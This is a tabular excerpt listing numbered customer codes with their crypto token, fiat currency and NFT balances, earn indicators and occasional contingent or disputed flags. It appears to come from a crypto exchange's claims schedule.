| 07346365 | | BAT[32.45888978], BCH[.02764767], BRZ[1], BTC[.00100312], CAD[20.41], CUSDT[7], DOGE[1676.90304303], ETH[.01351228], ETHW[.01334812], GRT[44.69166958], SHIB[1001484.01862752], SOL[1.90989722], SUSHI[1.4052339], TRX[750.96212482], USD[6.07], USDT[1.09331473] | Yes | |
| 07346366 | | CUSDT[3], DOGE[59.49638399], TRX[1], USD[0.00] | | |
| 07346368 | | CUSDT[519.61718354], DOGE[1], USD[0.00] | | |
| 07346370 | | BRZ[1], CUSDT[4], DOGE[7249.22338392], TRX[1], USD[0.00] | | |
| 07346371 | | BRZ[2], CAD[30.70, CUSDT[5], SHIB[1], USD[0.01], USDT[1] | | |
| 07346372 | | USD[10.00] | | |
| 07346374 | | CUSDT[2], GRT[14.41863226], USD[0.00] | | |
| 07346375 | | CUSDT[.97902], DOGE[0.00004618], TRX[2], USD[0.00], USDT[0] | | |
| 07346376 | | BRZ[1], CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07346377 | | USD[10.00] | | |
| 07346378 | | DOGE[207.71412886], USD[0.00] | | |
| 07346379 | | CUSDT[.00001029], DOGE[.00002777], USD[0.00] | | |
| 07346381 | | USD[10.00] | | |
| 07346382 | | USD[10.00] | | |
| 07346383 | | CUSDT[2], DOGE[15.40739708], GRT[1.79153633], LINK[.18031695], TRX[1], USD[0.01] | | |
| 07346384 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07346385 | | USD[10.00] | | |
| 07346387 | | CUSDT[258.35619565], DOGE[29.63309465], TRX[34.37183], USD[0.97] | Yes | |
| 07346388 | | CUSDT[2], DOGE[543.99998224], TRX[0], USD[0.00] | Yes | |
| 07346389 | | CUSDT[14], DOGE[1], TRX[2], USD[0.80] | Yes | |
| 07346390 | | USD[10.00] | | |
| 07346391 | | USD[10.00] | | |
| 07346392 | | BRZ[1], DOGE[123.47498418], TRX[1], USD[0.00], USDT[1] | | |
| 07346393 | | DOGE[17.94933223], USD[0.00] | | |
| 07346394 | | SUSHI[.56232088], USD[0.00] | | |
| 07346395 | | USD[10.00] | | |
| 07346396 | | USD[10.00] | | |
| 07346397 | | BCH[.000982], BTC[0.00000106], DOGE[838.9382], SHIB[92305], TRX[.000002], USD[0.09], USDT[0.00241300] | | |
| 07346398 | | DOGE[891.62363988], GRT[1], USD[0.00] | | |
| 07346399 | | BTC[.00536345], DOGE[5654.47737146], ETH[.03231478], ETHW[.03231478], TRX[1779.55973045], USD[0.17] | | |
| 07346400 | | USD[10.00] | | |
| 07346401 | | DOGE[627.75208545], TRX[82.02446215], USD[0.00] | | |
| 07346402 | | USD[10.00] | | |
| 07346403 | | TRX[80.46782707], USD[0.00] | | |
| 07346404 | | BAT[1], BRZ[3], CUSDT[11], DOGE[1], TRX[2], USD[0.01], USDT[1] | | |
| 07346405 | | USD[10.00] | | |
| 07346406 | | USD[10.00] | | |
| 07346407 | | DOGE[2040.57193947], SHIB[1315360.27549052], USD[0.00] | | |
| 07346408 | | USD[10.00] | | |
| 07346409 | | USD[10.00] | | |
| 07346410 | | BTC[0.00015490], USD[0.00] | Yes | |
| 07346411 | | CUSDT[4], DOGE[0], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07346412 | | CUSDT[1], TRX[1], USD[4.84], USDT[0] | | |
| 07346413 | | CUSDT[3], DOGE[2411.42255145], TRX[2], USD[0.00] | Yes | |
| 07346414 | | CUSDT[2], DOGE[76.95939666], USD[0.00] | Yes | |
| 07346416 | | CUSDT[1], DOGE[1867.43908994], ETH[.01509914], ETHW[.01509914], TRX[1], USD[0.00] | | |
| 07346417 | | USD[10.00] | | |
| 07346418 | | USD[10.00] | | |
| 07346420 | | USD[10.00] | | |
| 07346421 | | DOGE[.77387724], USD[0.00] | | |
| 07346422 | | CUSDT[2], USD[0.01] | | |
| 07346423 | | USD[10.00] | | |
| 07346424 | | USD[0.00] | | |
| 07346425 | | BRZ[0], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], SOL[0], SUSHI[0], TRX[2.04231853], USD[0.00], USDT[0] | | |
| 07346426 | | USD[20.00] | | |
| 07346428 | | BRZ[0], BTC[0], CUSDT[1], DOGE[2], ETH[0], SOL[0], TRX[0], UNI[0], USD[0.33], USDT[0] | | |
| 07346429 | | BF_POINT[100], DOGE[0], NFT [380267847814900786/Entrance Voucher #2480/][1], SUSHI[0], USD[1.35], USDT[0] | Yes | |
| 07346430 | | USD[10.00] | | |
| 07346431 | | BAT[1], BRZ[2], DOGE[1385.75], USDT[1] | | |
| 07346432 | | DOGE[.00007458], TRX[1], USD[0.01] | | |
| 07346433 | | USD[10.00] | | |
| 07346435 | | USD[10.00] | | |
| 07346436 | | DOGE[2202.15704095], TRX[1], USD[0.00] | Yes | |
| 07346437 | | USD[10.00] | | |
| 07346438 | | DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07346441 | | TRX[1], USD[0.00] | | |
| 07346442 | | BTC[0.00045927], DOGE[223.70094104], USD[0.00] | Yes | |
| 07346444 | | USD[10.00] | | |
| 07346445 | | BRZ[5.07952967], CUSDT[26], TRX[8.00087675], USD[0.01] | Yes | |
| 07346446 | | USD[10.00] | | |
| 07346447 | | USD[10.00] | | |
| 07346448 | | USD[10.00] | | |
| 07346449 | | USD[10.00] | | |
| 07346450 | | DOGE[1861.47211882], USD[0.02] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07346451 | | USD[10.00] | | |
| 07346452 | | USD[10.00] | | |
| 07346453 | | USD[10.00] | | |
| 07346454 | | USD[0.00] | | |
| 07346455 | | USD[10.00] | | |
| 07346456 | | USD[10.00] | | |
| 07346457 | | BRZ[1], CUSDT[1], DOGE[3.86130628], TRX[1], USD[0.51] | | |
| 07346458 | | CUSDT[3], TRX[1], USD[0.00] | | |
| 07346459 | | USD[10.00] | | |
| 07346460 | | DOGE[1], TRX[1], USD[0.43] | | |
| 07346461 | | USD[10.00] | | |
| 07346462 | | USD[10.00] | | |
| 07346463 | | DOGE[.00009712], TRX[.00007415], USD[0.01] | | |
| 07346464 | | BAT[0], BRZ[0], DOGE[0], ETH[.00000001], ETHW[0], GRT[0], LINK[0], SOL[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07346465 | | BAT[0], BTC[0], DOGE[0], ETH[0], ETHW[0], LTC[0], SOL[0], USD[0.01] | | |
| 07346466 | | USD[0.00] | | |
| 07346468 | | DOGE[.64060776], TRX[1], USD[0.01] | Yes | |
| 07346469 | | BTC[0], USD[2.03] | | |
| 07346471 | | BAT[1.0165555], BRZ[6.62261025], BTC[0], CUSDT[10], DOGE[1], ETH[0], SOL[0.00055211], TRX[11.22467365], USD[0.00], USDT[2.20753677] | Yes | |
| 07346472 | | USD[10.00] | | |
| 07346473 | | BTC[.00028463], CUSDT[10], DOGE[162.43869548], TRX[1], USD[4.16] | | |
| 07346474 | | DOGE[.00000181], USD[7.73] | | |
| 07346475 | | BRZ[3], BTC[.04637006], CUSDT[3], DOGE[956.80418111], TRX[3], USD[0.00] | | |
| 07346476 | | BAT[1.0165555], BRZ[3], BTC[.00000023], CUSDT[18], DOGE[6.06225027], ETH[0.00327700], ETHW[0.00323593], GRT[2.00863961], LTC[.13731915], SOL[2.38881413], TRX[6], UNI[.20870183], USD[0.00], USDT[1.09521608] | Yes | |
| 07346477 | | DOGE[6964.31957252], USD[0.00] | | |
| 07346478 | | BTC[.00023266], USD[0.05] | Yes | |
| 07346479 | | DAI[9.9470557], USD[0.00] | | |
| 07346480 | | USD[10.00] | | |
| 07346481 | | USD[10.00] | | |
| 07346482 | | USD[10.00] | | |
| 07346483 | Contingent, Disputed | DOGE[0], USD[0.04] | Yes | |
| 07346484 | | BRZ[1], CUSDT[3], DOGE[39.04509638], TRX[2], USD[0.06] | | |
| 07346485 | | DOGE[148.42959635], GRT[29.83875665], LINK[1.93042925], SHIB[529521.81973185], USD[0.00] | Yes | |
| 07346487 | | CUSDT[5], DOGE[713.43048567], ETH[.03016506], ETHW[.02979383], LTC[.02586097], SOL[.68188166], SUSHI[.52234881], TRX[1], USD[0.01] | Yes | |
| 07346488 | | USD[10.00] | | |
| 07346490 | | USD[10.00] | | |
| 07346491 | | USD[10.00] | | |
| 07346492 | | USD[10.00] | | |
| 07346493 | | USD[10.96] | Yes | |
| 07346494 | | USD[0.00] | | |
| 07346495 | | USD[10.00] | | |
| 07346496 | | CUSDT[4], DOGE[595.31614234], GRT[1.00498957], USD[144.42], USDT[0] | Yes | |
| 07346497 | | USD[10.41] | Yes | |
| 07346498 | | BAT[2.00653118], BRZ[2], CUSDT[4], DOGE[0], GRT[1], KSHIB[105713.53379781], MATIC[378.38248507], NFT (461063288494707710/Imola Ticket Stub #160)[1], SHIB[1], TRX[1], USD[0.00], USDT[1.04474363] | Yes | |
| 07346499 | | DOGE[.00097115], USD[10.00], USDT[0] | | |
| 07346500 | | CUSDT[1], DOGE[1667.54991227], USD[10.00] | | |
| 07346501 | | BRZ[1], CUSDT[2], USD[0.00] | | |
| 07346503 | | CUSDT[1], SHIB[32507.37786854], USD[0.00] | Yes | |
| 07346504 | | BRZ[0], DOGE[1], USD[0.00], USDT[0] | Yes | |
| 07346505 | | USD[0.01] | | |
| 07346506 | | USD[10.00] | | |
| 07346507 | | CUSDT[2], DOGE[347.03631601], TRX[1], USD[0.00] | Yes | |
| 07346508 | | USD[10.00] | | |
| 07346509 | | BRZ[1], CUSDT[11], DOGE[624.14669807], NFT (325990677555086674/7258)[1], NFT (367370472228377842/1342)[1], NFT (511856960109404887/Egg#0034)[1], NFT (523668523529468652/72559)[1], SOL[.45753528], TRX[4], USD[0.01] | | |
| 07346510 | | USD[10.00] | | |
| 07346511 | Contingent, Disputed | BTC[0], DOGE[0], GRT[0], USD[0.00] | | |
| 07346512 | | BAT[0], USD[8.95] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07346513 | | USD[10.00] | | |
| 07346514 | | SOL[0.00995556], USD[0.00] | | |
| 07346515 | | CUSDT[5], DOGE[175.94118264], ETHW[.07428828], SHIB[1], TRX[2], USD[109.16], USDT[1.09045301] | Yes | |
| 07346516 | | DOGE[0], SHIB[146785380.55051709], SOL[24.53153506], TRX[0], USD[0.00] | Yes | |
| 07346518 | | USD[10.00] | | |
| 07346519 | | BAT[1], CUSDT[3], DOGE[1145.12212753], ETH[1.00275868], ETHW[1.00275868], USD[0.00] | | |
| 07346520 | | USD[10.00] | | |
| 07346521 | | USD[0.00] | | |
| 07346522 | | BRZ[1], CUSDT[3], DOGE[10697.10738248], TRX[6673.14923759], USD[0.00] | | |
| 07346525 | | BTC[.00020915], USD[0.00] | | |
| 07346526 | | BCH[0], SOL[0], USD[0.00], USDT[0] | | |
| 07346527 | | USD[10.00] | | |
| 07346528 | | BRZ[0], DOGE[479.39588921], USD[0.00] | | |
| 07346529 | | USD[10.00] | | |
| 07346530 | | USD[10.00] | | |
| 07346532 | | USD[0.00] | | |
| 07346533 | | BRZ[1], CUSDT[2], DOGE[3], ETH[0], TRX[3], USD[0.00] | Yes | |
| 07346535 | | CUSDT[2], DOGE[0], GRT[0], LINK[0], TRX[2], USD[0.00] | Yes | |
| 07346536 | | DOGE[1.00056702], TRX[397.72875318], USD[10.00] | | |
| 07346537 | | DOGE[126.46711406], USD[0.00] | | |
| 07346539 | | DOGE[140.57243908], USD[0.00] | | |
| 07346540 | | DOGE[2065.67897763], USD[10.00] | | |
| 07346541 | | DOGE[680.8785193], USD[10.00] | | |
| 07346542 | | USD[0.00], USDT[0] | | |
| 07346543 | | DOGE[30.9621967], USD[0.00] | | |
| 07346544 | | BAT[13.18190204], CUSDT[711.4208764], DOGE[1764.20813535], ETH[.06574161], ETHW[.06574161], LTC[.07802981], TRX[984.99856074], USD[0.28], USDT[9.94307974] | | |
| 07346545 | | USD[10.00] | | |
| 07346546 | | DOGE[0], USD[0.00] | | |
| 07346547 | | USD[10.00] | | |
| 07346548 | | USD[10.00] | | |
| 07346549 | | USD[10.00] | | |
| 07346550 | | USD[10.00] | | |
| 07346551 | | CUSDT[1], GRT[3.90172791], USD[0.00] | | |
| 07346553 | | AUD[0.00], BRZ[.00000006], CUSDT[913.93981275], DOGE[254.5973222], SHIB[206897.55169655], TRX[941.77038258], USD[133.55] | | |
| 07346555 | | BRZ[1], CUSDT[1], GRT[4.2042769], SUSHI[.00000999], TRX[6], UNI[.00000999], USD[0.00], USDT[0.00000475] | Yes | |
| 07346556 | | BTC[.00001246], DOGE[0], USD[0.01] | | |
| 07346557 | | USD[10.00] | | |
| 07346558 | | USD[10.00] | | |
| 07346559 | | USD[0.00], USDT[0] | | |
| 07346560 | | BRZ[1], CUSDT[3], DOGE[0], GRT[1.00498957], TRX[3], USD[0.00] | Yes | |
| 07346561 | | TRX[52.5448032], USD[1.00] | | |
| 07346562 | | BRZ[1], CUSDT[1], DOGE[1198.15645816], USD[0.00] | | |
| 07346563 | | BAT[4.09625888], BRZ[1], CUSDT[18], DOGE[1], HKD[165.49], SHIB[1], TRX[5], USD[0.48] | Yes | |
| 07346564 | | BAT[0], NFT (304194821201472895/SKULL-BIT #2)[1], NFT (362535274381659694/SKULL-BIT #3)[1], NFT (503494515011005403/Sigma Shark #898)[1], NFT (515162975199165806/Sigma Shark #5224)[1], NFT (561214900853374295/Man #9)[1], SOL[4.64575778], USD[0.00] | | |
| 07346565 | | BRZ[1], DOGE[1], ETH[0], NFT (410099988383943230/Kiddo #2742)[1], NFT (447683130885367560/SOLYETIS #1448)[1], NFT (457263168432227528/Onk 2744)[1], NFT (492279491640299566/SOLYETIS #4737)[1], TRX[0], USD[0.00], USDT[296.87290690] | Yes | |
| 07346567 | | USD[0.00] | | |
| 07346568 | | USD[10.00] | | |
| 07346569 | | BAT[1.00396217], BRZ[1], CUSDT[12], DOGE[16.07712869], GRT[5.20840381], SOL[.0000508], TRX[2], USD[0.02], USDT[2.16499411] | Yes | |
| 07346570 | | BTC[0], CUSDT[1], DOGE[0], USD[0.00] | Yes | |
| 07346571 | | BRZ[12.17661394], DOGE[70.47591366], SHIB[222958.57035484], USD[0.00] | Yes | |
| 07346573 | | BTC[0], USD[0.00] | | |
| 07346574 | | USD[10.00] | | |
| 07346575 | | BTC[.00021115], USD[0.00] | | |
| 07346577 | | BRZ[1], CUSDT[1], DOGE[.00789252], USD[0.00] | | |
| 07346578 | | USD[10.00] | | |
| 07346579 | | USD[10.00] | | |
| 07346581 | | USD[10.89] | Yes | |
| 07346583 | | ETH[.0054673], ETHW[.0054673], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07346584 | | BRZ[1], CUSDT[1], DOGE[1], ETH[.15329032], ETHW[.15329032], GRT[2], TRX[2], USD[0.01], USDT[.7751729] | | |
| 07346585 | | DOGE[0], USD[0.00] | Yes | |
| 07346586 | | GRT[4.43333256], USD[0.00] | | |
| 07346587 | | USD[20.00] | | |
| 07346588 | | USD[10.00] | | |
| 07346589 | | BRZ[1], CUSDT[1], DOGE[1], USD[32.46] | | |
| 07346590 | | TRX[.01253242], USD[0.00], USDT[0] | | |
| 07346591 | | USD[10.00] | | |
| 07346592 | | DOGE[1.28494782], USD[0.00], USDT[0] | | |
| 07346593 | | BRZ[2], CUSDT[6], GRT[1.00367791], TRX[4], USD[0.00], USDT[1.02316826] | | |
| 07346594 | | USD[10.00] | | |
| 07346595 | | USD[10.00] | | |
| 07346597 | | DOGE[6.54643933], USD[1.18], USDT[0] | | |
| 07346598 | | USD[10.00] | | |
| 07346599 | | BAT[8.38123525], BRZ[13.73148437], CUSDT[23], DOGE[16.19580618], GRT[9.22442901], LINK[2.06064194], NFT (401333577446424004/Romeo #1224)[1], SHIB[3.00000001], TRX[15.00796225], UNI[1.05406864], USD[0.00], USDT[0] | | |
| 07346600 | | USD[10.00] | | |
| 07346601 | | USD[10.00] | | |
| 07346602 | | USD[10.00] | | |
| 07346603 | | DOGE[1], USD[27.28] | | |
| 07346604 | | USD[10.00] | | |
| 07346605 | | BTC[.00023216], USD[0.00] | Yes | |
| 07346606 | | USD[10.00] | | |
| 07346607 | | CUSDT[1], USD[0.01] | | |
| 07346608 | | TRX[1], USD[120.48] | | |
| 07346610 | | BRZ[0], DOGE[3.13825701], USD[0.00] | | |
| 07346611 | | USD[10.00] | | |
| 07346612 | | CUSDT[2], DOGE[4019.78606553], GRT[2], LINK[1], TRX[3], USD[0.00], USDT[1] | | |
| 07346613 | | DOGE[.00041106], TRX[1], USD[10.00] | | |
| 07346614 | | BRZ[1], CUSDT[7], SUSHI[0], TRX[2], USD[0.01] | | |
| 07346615 | | USD[10.00] | | |
| 07346616 | | BRZ[8.66689268], CUSDT[102.79886209], DOGE[24.86568966], SHIB[8.30617033], SOL[0.00039200], TRX[0], USD[0.01] | Yes | |
| 07346618 | | USD[10.00] | | |
| 07346619 | | USD[10.00] | | |
| 07346620 | | SOL[.67532256], USD[0.00] | | |
| 07346621 | | BTC[.00108333], DOGE[2], ETH[.01901152], ETHW[.01877896], USD[0.00] | Yes | |
| 07346622 | | USD[10.00] | | |
| 07346623 | | ETH[0], SOL[0], USD[2.26] | Yes | |
| 07346624 | | CUSDT[4], DOGE[31.47824743], ETH[.00646496], ETHW[.00646496], USD[0.00] | | |
| 07346625 | | USD[10.00] | | |
| 07346626 | | CUSDT[5], DOGE[.62991005], TRX[1], USD[15.09] | | |
| 07346627 | | TRX[1], USD[0.00] | | |
| 07346628 | | BRZ[1], CUSDT[1], DOGE[132.12004801], USD[0.00] | | |
| 07346629 | | USD[10.00] | | |
| 07346630 | | BRZ[1], DOGE[1], USD[10.00] | | |
| 07346631 | | USD[10.00] | | |
| 07346632 | | DOGE[0], ETH[0], ETHW[0], LTC[0.00001983], USD[0.00], USDT[0] | | |
| 07346633 | | USD[10.00] | | |
| 07346634 | | USD[20.45] | | |
| 07346635 | | USD[10.00] | | |
| 07346637 | | USD[10.00] | | |
| 07346638 | | USD[0.00] | | |
| 07346639 | | USD[0.01] | | |
| 07346640 | | USD[10.00] | | |
| 07346641 | | BTC[.00106571], CUSDT[4], DOGE[1023.77776721], ETH[.01291782], ETHW[.01291782], TRX[1], USD[21.31] | | |
| 07346642 | | CUSDT[13], TRX[1], USD[0.00] | Yes | |
| 07346643 | | USD[10.00] | | |
| 07346644 | | BAT[7.32393774], BRZ[27.95708832], CUSDT[944.68200385], DAI[19.91999988], DOGE[958.89636493], GRT[21.58103951], LINK[.05548921], SOL[1.0105139], SUSHI[1.25625356], TRX[191.10381179], USD[1.00] | | |
| 07346646 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07346648 | | BRZ[.60840334], CUSDT[15], DOGE[.72176251], GRT[.00001524], NEAR[4.21552747], SHIB[1.31114058], TRX[1.02426855], USD[0.01] | Yes | |
| 07346650 | | USD[10.00] | | |
| 07346651 | | DOGE[6334.56236497], SOL[26.28384784], USD[260.00] | | |
| 07346652 | | USD[10.00] | | |
| 07346653 | | USD[10.00] | | |
| 07346654 | | BRZ[0], USD[0.00], USDT[0.00000001] | | |
| 07346655 | | USD[10.00] | | |
| 07346656 | | USD[11.02] | Yes | |
| 07346657 | | DOGE[1], LINK[0], TRX[5.16417384], USD[0.00] | | |
| 07346658 | | USD[10.00] | | |
| 07346659 | | DOGE[0], USD[18.80] | | |
| 07346660 | | BTC[0], DOGE[0], USD[0.01] | | |
| 07346661 | | USD[10.00] | | |
| 07346662 | | USD[10.00] | | |
| 07346663 | | BAT[.00002008], BRZ[1], BTC[0], CUSDT[26], DOGE[0], ETH[0.03543094], ETHW[0.03543094], LTC[0], SHIB[5], TRX[298.78997801], UNI[.18621857], USD[0.00], USDT[0] | | |
| 07346664 | | BRZ[1], CUSDT[1], TRX[1], USD[0.00] | | |
| 07346665 | | CUSDT[237.35085622], DOGE[3415.85513317], SUSHI[5.18713271], TRX[1676.57213426], USD[5.00], USDT[99.43079746] | | |
| 07346666 | Contingent, Disputed | BAT[3], BRZ[1], BTC[.00200701], DOGE[1], ETH[.0237988], ETHW[.0237988], GRT[3], SOL[1], TRX[23475.31679102], UNI[1], USD[0.00], USDT[3] | | |
| 07346667 | | BAT[0], BRZ[0], BTC[0], CUSDT[2], DOGE[0], ETH[.0000004], ETHW[0.00000039], GBP[0.00], SGD[0.00], SHIB[10], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07346668 | | BTC[0], DOGE[1], USD[11.41], USDT[0.00000001] | | |
| 07346669 | | USD[0.00], USDT[0.00000001] | | |
| 07346670 | | USD[0.01] | | |
| 07346671 | | USD[10.00] | | |
| 07346672 | | USD[10.00] | | |
| 07346675 | | BRZ[2], LINK[1], USD[0.00] | | |
| 07346676 | | USD[10.00] | | |
| 07346678 | | BRZ[2.05174859], BTC[.00022141], CUSDT[1], DOGE[.01977033], GRT[142.14087298], TRX[1], USD[0.00] | Yes | |
| 07346679 | | USD[10.00] | | |
| 07346681 | | GRT[5.23521156], USD[0.00] | | |
| 07346682 | | SHIB[49539113.78906410], USD[0.00], USDT[0] | Yes | |
| 07346683 | | USD[10.00] | | |
| 07346684 | | USD[10.00] | | |
| 07346685 | | USD[10.00] | | |
| 07346686 | | USD[0.00] | | |
| 07346687 | | USD[10.00] | | |
| 07346688 | | USD[10.00] | | |
| 07346689 | | USD[10.00] | | |
| 07346690 | | USD[10.00] | | |
| 07346691 | | DOGE[0], ETH[0], LTC[0], USD[0.27] | | |
| 07346692 | | USD[10.00] | | |
| 07346693 | | BAT[16.67683425], USD[0.00] | | |
| 07346694 | | USD[10.00] | | |
| 07346696 | | USD[10.00] | | |
| 07346697 | | DOGE[151.8556], USD[0.02] | | |
| 07346698 | | DOGE[164.53062046], USD[0.00] | | |
| 07346699 | | USD[8.52] | | |
| 07346700 | | USD[10.00] | | |
| 07346701 | | USD[10.00] | | |
| 07346702 | | DOGE[1], TRX[207.5515558], USD[0.00] | | |
| 07346703 | | BAT[0], BCH[0], BTC[0], DAI[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], SHIB[6935.20795212], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07346705 | | CUSDT[2], DOGE[44.73059271], USD[0.00] | Yes | |
| 07346706 | | ETH[0.04426541], ETHW[0.04426541], SHIB[1], USD[0.00] | | |
| 07346708 | | USD[10.00] | | |
| 07346710 | | DOGE[1.00003999], USD[0.01] | | |
| 07346711 | | USD[10.00] | | |
| 07346712 | | DOGE[12073.69838449], USD[10.00] | | |
| 07346713 | | BAT[1], BRZ[1], CUSDT[3], TRX[3], USD[0.01] | | |
| 07346714 | | CUSDT[3], DOGE[345.05507495], ETH[.00549076], ETHW[.00542236], TRX[697.59540324], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07346715 | | USD[10.00] | | |
| 07346716 | | ETH[.00229498], ETHW[.00229498], USD[0.00] | | |
| 07346717 | | USD[10.00] | | |
| 07346718 | | USD[10.00] | | |
| 07346719 | | USD[10.00] | | |
| 07346720 | | BTC[.02649369], CUSDT[9], SOL[2.20933131], TRX[4], USD[0.00] | Yes | |
| 07346721 | | USD[10.00] | | |
| 07346722 | | USD[9.94], USDT[0.00001116] | | |
| 07346723 | | DOGE[0], USD[0.00], USDT[0] | Yes | |
| 07346724 | | USD[10.00] | | |
| 07346725 | | USD[10.00] | | |
| 07346726 | | BTC[0], DOGE[1], ETH[0], SUSHI[0], USD[0.00] | | |
| 07346727 | | CUSDT[3], DOGE[3356.95008292], SHIB[1523302.72976036], TRX[1], USD[0.00] | Yes | |
| 07346729 | | USD[10.00] | | |
| 07346730 | | USD[10.00] | | |
| 07346731 | | USD[10.00] | | |
| 07346732 | | TRX[224.30336338], USD[0.00] | Yes | |
| 07346733 | | BTC[0], DOGE[0.00187484], ETH[0.00000015], ETHW[0], SHIB[22.34214687], SUSHI[0], USD[59.94] | Yes | |
| 07346734 | | USD[10.00] | | |
| 07346735 | | USD[0.06] | | |
| 07346736 | | BRZ[1], CUSDT[2], USD[0.00] | | |
| 07346737 | | BRZ[1], CUSDT[7], DOGE[0], USD[27.04] | | |
| 07346738 | | USD[10.00] | | |
| 07346739 | | BAT[1], BRZ[1], CUSDT[1], USD[0.00] | | |
| 07346740 | | BAT[1], BRZ[1], BTC[0], CUSDT[3], DOGE[2.00000442], TRX[4], USD[0.29] | | |
| 07346741 | | BRZ[2], CUSDT[7], DOGE[2], LTC[0], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07346742 | | BTC[.0002215], USD[0.00] | | |
| 07346743 | | BF_POINT[300], USD[10.00] | | |
| 07346744 | | CUSDT[1], USD[0.00] | | |
| 07346745 | | CUSDT[3], DOGE[6.18412485], USD[0.39] | Yes | |
| 07346746 | | USD[10.00] | | |
| 07346747 | | BRZ[2], CUSDT[12], DOGE[1023.87621311], NFT (326644221330142023/Entrance Voucher #3866)[1], NFT (453242065727666446/Humpty Dumpty #457)[1], SHIB[1454242.14319727], TRX[2], USD[0.00] | | |
| 07346748 | | USD[10.00] | | |
| 07346749 | | SOL[1.07492179], USD[0.00] | | |
| 07346750 | | USD[0.81] | | |
| 07346751 | | CUSDT[1], DOGE[21.2639559], USD[0.00] | | |
| 07346752 | | CUSDT[1], DOGE[1], TRX[1.85557319], USD[0.00] | | |
| 07346753 | | CUSDT[1], DOGE[1], USD[0.00], USDT[2] | | |
| 07346754 | | BRZ[1], CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07346756 | | BTC[.000007], SHIB[330238.04465807], USD[0.00] | | |
| 07346757 | | USD[10.00] | | |
| 07346758 | Contingent, Disputed | DOGE[1], SHIB[3], TRX[1], USD[0.01], USDT[0] | | |
| 07346759 | | BF_POINT[100], CUSDT[4], MATIC[.93606363], NFT (289402050758213371/Solninjas #7071)[1], NFT (294591983654210797/Solninjas #8716)[1], NFT (298672489340847329/Solninjas #3493)[1], NFT (299940904056648083/Solninjas #853)[1], NFT (302411327969011086/Solninjas #1213)[1], NFT (306301537268937087/615)[1], NFT (329990255972055260/Golden Eagle)[1], NFT (343626843154575089/Kiddo #3364)[1], NFT (348353103006059502/Solninjas #6449)[1], NFT (357517881610954693/Solninjas #787)[1], NFT (374671294076620838/Miner Bot 398)[1], NFT (376800185676975514/Solninjas #6843)[1], NFT (433171983731464209/Cadet 372)[1], NFT (471031397534163929/Space Bums #1481)[1], NFT (497740884287543029/Flaming Scotch)[1], NFT (498784164285879887/Solninjas #4866)[1], NFT (502680346140815025/Solninjas #6044)[1], NFT (509531230276741831/Solninjas #6859)[1], NFT (523968095188786465/Solninjas #3329)[1], NFT (531474716944619450/Solninjas #7543)[1], NFT (545568089800267796/Mech #7834)[1], NFT (563341342034254531/Mech #5573)[1], NFT (566898010506620347/Solninjas #4950)[1], NFT (574922045002941468/DarkPunk #3307)[1], SOL[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07346760 | | CUSDT[1], USD[0.00] | | |
| 07346761 | | USD[10.00] | | |
| 07346762 | | CUSDT[4], DOGE[1113.05444148], USD[0.00] | | |
| 07346763 | | BRZ[0], CUSDT[1], DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07346764 | | BAT[.00076075], DOGE[2.00050253], SOL[.00000005], SUSHI[.00000008], UNI[.00000004], USD[66.98] | | |
| 07346765 | | USD[10.00] | | |
| 07346766 | | BRZ[3], CUSDT[5], DOGE[4047.28506871], ETH[.24195143], ETHW[.24195143], SUSHI[1.88218488], TRX[2], USD[0.00], USDT[0] | | |
| 07346768 | | BTC[.00196291], DOGE[1], USD[0.00] | | |
| 07346769 | | CUSDT[1], DOGE[4720.80265167], ETH[.00546611], ETHW[.00546611], SHIB[7.58204981], SOL[.00171471], TRX[2], USD[0.00], USDT[0] | | |
| 07346770 | | USD[10.00] | | |
| 07346771 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07346772 | | BRZ[0], CUSDT[3], DOGE[.80376635], USD[0.01] | | |
| 07346774 | | CUSDT[1], DOGE[.00001599], USD[44.30] | | |
| 07346775 | | BRZ[1], CUSDT[3], DOGE[1.00367162], TRX[1], USD[0.93] | Yes | |
| 07346776 | | BRZ[4], GRT[1.00090455], SHIB[207.86442095], TRX[3], USD[1342.21] | Yes | |
| 07346777 | | USD[0.01] | | |
| 07346778 | | BAT[3.28216168], BRZ[3], BTC[.03731942], CUSDT[4], GRT[2.07507296], TRX[8.00087675], USD[0.01], USDT[4.40116552] | Yes | |
| 07346779 | | BTC[0], CUSDT[1], DOGE[0], ETH[0], USD[0.00], USDT[0] | | |
| 07346780 | | USD[10.00] | | |
